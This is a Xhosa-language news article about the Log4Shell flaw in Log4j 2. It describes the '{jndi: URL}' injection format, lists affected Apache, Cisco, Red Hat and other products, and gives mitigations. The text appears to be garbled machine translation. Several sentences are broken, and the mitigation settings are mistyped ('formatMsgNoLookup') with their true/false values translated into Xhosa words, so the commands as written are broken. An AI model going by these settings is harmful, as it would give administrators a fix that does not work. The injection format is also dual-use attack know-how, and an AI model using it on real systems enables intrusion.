Ngemihla yokugqibela kumnatha kuye kwathethwa kakhulu malunga nokuba sesichengeni kweLog4j apho ii-vectors ezahlukeneyo zohlaselo zifunyenwe kwaye izinto ezahlukeneyo zokuxhaphaza ezisebenzayo ziye zahluzwa ukuze kusetyenziswe ukuba sesichengeni.
Ubunzulu balo mbandela kukuba esi sisikhokelo esidumileyo sokuququzelela ubhaliso kwizicelo zeJava., evumela ukuba ikhowudi engafanelekanga iqhutywe xa ixabiso elifomathiweyo libhalwa kwirejista kwifomathi "{jndi: URL}". Uhlaselo lunokuqhutywa kwizicelo zeJava ezigcina amaxabiso afunyenwe kwimithombo yangaphandle, umzekelo ngokubonisa amaxabiso anengxaki kwimiyalezo yempazamo.
Kwaye oko umhlaseli wenza isicelo se-HTTP kwindlela ekujoliswe kuyo, eyenza ilogi usebenzisa i-Log4j 2 Esebenzisa i-JNDI ukwenza isicelo kwindawo elawulwa ngumhlaseli. Ukuba sesichengeni kubangela ukuba inkqubo exhatshaziweyo ifike kwindawo kwaye iqhube umthwalo wokuhlawula. Kwiintlaselo ezininzi eziqatshelweyo, iparameter yomhlaseli yinkqubo yokubhalisa ye-DNS, ejoliswe ukubhalisa isicelo kwisayithi ukuchonga iinkqubo ezisengozini.
Njengoko umlingane wethu uIsake sele ekwabele:
Oku buthathaka kwe-Log4j kuvumela ukusebenzisa uqinisekiso lwegalelo olungachanekanga kwi-LDAP, luvumela ukwenziwa kwekhowudi ekude (RCE), kunye nokunciphisa umncedisi (ukugcinwa kwemfihlo, ukunyaniseka kwedatha kunye nokufumaneka kwenkqubo). Ukongeza, ingxaki okanye ukubaluleka kobu sesichengeni kulele kwinani lezicelo kunye neeseva ezizisebenzisayo, kubandakanya isoftware yeshishini kunye neenkonzo zelifu ezinje ngeApple iCloud, iSteam, okanye imidlalo yevidiyo edumileyo efana neMinecraft: Ushicilelo lweJava, iTwitter, Cloudflare, I-Tencent, i-ElasticSearch, iRedis, i-Elastic Logstash, kunye nexesha elide njl.
Ukuthetha ngalo mba, kutshanje iApache Software Foundation ikhutshiwe mediante isithuba isishwankathelo seeprojekthi ezijongana nobuthathaka obubalulekileyo kwiLog4j 2 evumela ikhowudi engenasizathu ukuba isebenze kumncedisi.
Ezi projekthi zilandelayo ze-Apache zichaphazelekayo: i-Archiva, iDruid, i-EventMesh, i-Flink, i-Fortress, i-Geode, i-Hive, i-JMeter, i-Jena, i-JSPWiki, i-OFBiz, i-Ozone, i-SkyWalking, i-Solr, i-Struts, i-TrafficControl, kunye ne-Calcite Avatica. Ukuba sesichengeni kukwachaphazele iimveliso ze-GitHub, kuquka i-GitHub.com, i-GitHub Enterprise Cloud, kunye ne-GitHub Enterprise Server.
Kwiintsuku zakutshanje kuye kwakho ulwando oluphawulekayo Umsebenzi onxulumene nokuxhaphazwa kokuba sesichengeni. Umzekelo, Jonga indawo erekhodwe malunga ne-100 yokuzama ukuzama ngomzuzu kwiiseva zayo ezingeyonyani incopho yayo, kwaye uSophos wabhengeza ukufunyanwa kwebhotnet yezemigodi ye-cryptocurrency entsha, eyenziwe kwiinkqubo ezinobuthathaka obungafakwanga kwi-Log4j 2.
Ngokumalunga nolwazi olukhutshiweyo malunga nale ngxaki:
- Ubuthathaka buqinisekisiwe kwimifanekiso emininzi esemthethweni yeDocker, kubandakanya i-couchbase, elasticsearch, flink, solr, imifanekiso yesaqhwithi, njl.
- Ukuba sesichengeni kukhoyo kwimveliso yeMongoDB Atlas Search.
- Ingxaki ibonakala kwiimveliso ezahlukeneyo zeCisco, kuquka i-Cisco Webex Meetings Server, iCisco CX Cloud Agent, Cisco
- Ingxelo yoKhuseleko lwewebhu oluPhezulu, iCisco Firepower Threat Defense (FTD), i-Cisco Identity Services Engine (ISE), iCisco CloudCenter, iCisco DNA Centre, iCisco. BroadWorks, njl.
- Ingxaki ikhona kwi-IBM WebSphere Application Server kwaye kwiimveliso ezilandelayo ze-Red Hat: I-OpenShift, i-OpenShift Logging, i-OpenStack Platform, i-Integration Camel, i-CodeReady Studio, i-Data Grid, i-Fuse, kunye ne-AMQ Streams.
- Umba oqinisekisiweyo kwi-Junos Space Network Management Platform, i-Northstar Controller / Planner, iParagon Insights / Pathfinder / Planner.
- Iimveliso ezininzi ezivela kwi-Oracle, vmWare, Broadcom, kunye ne-Amazon nazo ziyachaphazeleka.
Iiprojekthi ze-Apache ezingachatshazelwanga ngumngcipheko we-Log4j 2: Apache Iceberg, Guacamole, Hadoop, Log4Net, Spark, Tomcat, ZooKeeper, kunye ne-CloudStack.
Abasebenzisi beepakethe ezinengxaki bayacetyiswa ukuba bafake ngokukhawuleza uhlaziyo olukhutshiweyo kubo, ukuhlaziya ngokwahlukeneyo uguqulelo lwe-Log4j 2 okanye usete iparameter Log4j2.formatMsgNoLookups kwinyani (umzekelo, ukongeza isitshixo "-DLog4j2.formatMsgNoLookup = Yinyani" ekuqaleni).
Ukutshixa isixokelelwano sisemngciphekweni apho kungekho ukufikelela ngokuthe ngqo, kwacetyiswa ukuba kusetyenziswe isitofu sokugonya iLogout4Shell, ethi, ngokuthunyelwa kohlaselo, iveze isicwangciso seJava "log4j2.formatMsgNoLookups = true", "com.sun.jndi .rmi.object. trustURLCodebase = bubuxoki "kunye" com.sun.jndi.cosnaming.object.trustURLCodebase = bubuxoki "ukuthintela ukubonakaliswa okungaphezulu kobuthathaka kwiinkqubo ezingalawulwayo.